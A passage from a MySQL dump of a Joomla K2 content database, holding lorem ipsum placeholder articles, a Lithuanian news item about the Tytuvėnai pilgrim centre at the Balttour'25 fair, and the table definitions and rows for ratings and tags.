00:00:00',1,1,1,0,0,'','','','',126,'{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}','','robots=\nauthor=','','','*'),(21,'Sed diam nonummy nibh euismod tincidunt ut laoreet dolore','sed-diam-nonummy-nibh-euismod-tincidunt-ut-laoreet-dolore',5,1,'<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci.</p>\r\n','\r\n<p> </p>\r\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat.Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat.</p>\r\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat.Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat.</p>',NULL,NULL,'[]','','2013-09-27 09:08:27',135,'',0,'0000-00-00 00:00:00','2013-10-07 09:06:24',135,'2013-09-27 09:08:27','0000-00-00 00:00:00',1,1,2,0,0,'','','','',123,'{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}','','robots=\nauthor=','','','*'),(22,'Magna aliquam erat volutpat ut wisi enim ad','magna-aliquam-erat-volutpat-ut-wisi-enim-ad',5,1,'<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci.</p>\r\n','\r\n<p> </p>\r\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat.Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat.</p>\r\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat.Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat.</p>',NULL,NULL,'[]','','2013-09-27 09:25:07',135,'',0,'0000-00-00 00:00:00','2013-10-07 09:06:01',135,'2013-09-27 09:25:07','0000-00-00 00:00:00',1,1,3,0,0,'','','','',133,'{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}','','robots=\nauthor=','','','*'),(23,'Minim veniam quis nostrud exerci tation ullamcorper suscipit','minim-veniam-quis-nostrud-exerci-tation-ullamcorper-suscipit',5,1,'<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci.</p>\r\n','\r\n<p> </p>\r\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat.Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat.</p>\r\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat.Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat.</p>',NULL,NULL,'[]','','2013-09-27 09:27:11',135,'',0,'0000-00-00 00:00:00','2013-10-07 09:05:37',135,'2013-09-27 09:27:11','0000-00-00 00:00:00',1,1,4,0,0,'','','','',136,'{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}','','robots=\nauthor=','','','*'),(24,'Quis nostrud exerci tation ipsum dolor sit amet','quis-nostrud-exerci-tation-ipsum-dolor-sit-amet',5,1,'<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci.</p>\r\n','\r\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat.Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat.</p>\r\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat.Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat.</p>',NULL,NULL,'[]','','2013-09-27 09:28:14',135,'',0,'0000-00-00 00:00:00','2013-10-07 09:05:15',135,'2013-09-27 09:28:14','0000-00-00 00:00:00',1,1,5,0,0,'','','','',286,'{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}','','robots=\nauthor=','','','*'),(25,'Tytuvėnų piligrimų centras dalyvavo parodoje Balttour\'25','tytuvenu-piligrimu-centras-dalyvavo-parodoje-balttour-25',1,0,'<p>VšĮ ,,Tytuvėnų piligrimų centras\'\' vasario 7-9 d. pristatatė Kelmės kraštą, pagrindinius lankytinus objektus, turistinius ir piligriminius maršrutus Rygoje vykusioje tarptautinėje turizmo parodoje Balttour\'25. Stendo lankytojai domėjosi lankytinais objektais, dalyvavo loterijoje.</p>','',NULL,NULL,'[]','','2025-02-12 10:51:42',135,'',0,'0000-00-00 00:00:00','2025-02-12 11:15:39',135,'2025-02-12 10:51:42','0000-00-00 00:00:00',1,1,1,0,1,'','','','',0,'{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}','','robots=\nauthor=','','','*'),(26,'Projektas Tytuvėnų įveiklinimas ir aktualizavimas','projektas-tytuvenu-iveiklinimas-ir-aktualizavimas',1,1,'','',NULL,NULL,'[]','','2025-04-01 06:17:08',135,'',135,'2025-04-01 06:33:18','2025-04-01 06:32:45',135,'2025-04-01 09:29:00','0000-00-00 00:00:00',1,1,1,1,0,'','','','',0,'{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}','','robots=\nauthor=','','','*');
/*!40000 ALTER TABLE `xyhmu_k2_items` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_k2_rating`
--

DROP TABLE IF EXISTS `xyhmu_k2_rating`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_k2_rating` (
  `itemID` int(11) NOT NULL DEFAULT '0',
  `rating_sum` int(11) unsigned NOT NULL DEFAULT '0',
  `rating_count` int(11) unsigned NOT NULL DEFAULT '0',
  `lastip` varchar(50) NOT NULL DEFAULT '',
  PRIMARY KEY (`itemID`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_k2_rating`
--

LOCK TABLES `xyhmu_k2_rating` WRITE;
/*!40000 ALTER TABLE `xyhmu_k2_rating` DISABLE KEYS */;
INSERT INTO `xyhmu_k2_rating` VALUES (24,5,1,'192.168.1.98');
/*!40000 ALTER TABLE `xyhmu_k2_rating` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_k2_tags`
--

DROP TABLE IF EXISTS `xyhmu_k2_tags`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_k2_tags` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) NOT NULL,
  `published` smallint(6) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  KEY `published` (`published`),
  FULLTEXT KEY `name` (`name`)
) ENGINE=MyISAM AUTO_INCREMENT=12 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_k2_tags`
--

LOCK TABLES `xyhmu_k2_tags` WRITE;
/*!40000 ALTER TABLE `xyhmu_k2_tags` DISABLE KEYS */;
INSERT INTO `xyhmu_k2_tags` VALUES (1,'academic',1),(2,'business',1),(3,'admission',1),(4,'alumni',1),(5,'university',1),(6,'joomla',1),(7,'joomshaper',1),(8,'helix',1),(9,'helixii',1),(10,'graduate',1),(11,'postgraduate',1);
/*!40000 ALTER TABLE `xyhmu_k2_tags` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_k2_tags_xref`
--

DROP TABLE IF EXISTS `xyhmu_k2_tags_xref`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_k2_tags_xref` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `tagID` int(11) NOT NULL,
  `itemID` int(11) NOT NULL,
  PRIMARY KEY (`id`),
  KEY `tagID` (`tagID`),
  KEY `itemID` (`itemID`)
) ENGINE=MyISAM AUTO_INCREMENT=41 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_k2_tags_xref`
--

LOCK TABLES `xyhmu_k2_tags_xref` WRITE;
/*!40000 ALTER TABLE `xyhmu_k2_tags_xref` DISABLE KEYS */;
INSERT INTO `xyhmu_k2_tags_xref` VALUES (32,1,24),(34,6,23),(36,7,22),(40,5,20),(38,3,21);
/*!40000 ALTER TABLE `xyhmu_k2_tags_xref` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_k2_user_groups`
--

DROP TABLE IF EXISTS `xyhmu_k2_user_groups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_k2_user_groups` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(255) NOT NULL,
  `permissions` text NOT NULL,
  PRIMARY KEY (`id`)
